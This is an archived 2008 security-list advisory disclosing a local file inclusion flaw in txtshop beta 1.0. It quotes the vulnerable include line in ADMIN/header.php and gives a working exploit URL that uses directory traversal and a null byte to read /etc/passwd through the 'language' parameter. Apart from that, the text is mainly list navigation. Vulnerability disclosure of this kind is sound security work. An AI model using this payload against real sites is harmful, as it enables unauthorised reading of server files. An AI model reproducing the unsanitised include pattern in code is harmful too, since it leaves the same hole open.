txtshop - beta 1.0 / Local File Inclusion Vulnerability
- From: Pepelux <pepelux@xxxxxxxxxxxx>
- Date: Thu, 23 Oct 2008 11:32:12 +0200
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
txtshop - beta 1.0 / Local File Inclusion Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
$ Program: txtshop
$ Version: <= 1.0
$ File affected: ADMIN/header.php
$ Download: http://sourceforge.net/projects/txtshop/
Found by Pepelux <pepelux[at]enye-sec.org>
eNYe-Sec - www.enye-sec.org
--Bug --
4. if (!$language)$language="ch";
5. include_once("../lib/lang.".$language.".php");
-- Exploit --
http://site.com/ADMIN/header.php?language=/../../../../../etc/passwd%00
- Prev by Date: Re: vshop - Axcoto cart <= 0.1alpha / Local File Inclusion Vulnerability
- Next by Date: [security bulletin] HPSBST02379 SSRT080143 rev.1 - Storage Management Appliance (SMA), Microsoft Patch Applicability MS08-056 to MS08-066
- Previous by thread: Re: MJGuest 6.8 GT Cross Site Scripting Vulnerability
- Next by thread: [security bulletin] HPSBST02379 SSRT080143 rev.1 - Storage Management Appliance (SMA), Microsoft Patch Applicability MS08-056 to MS08-066
- Index(es):
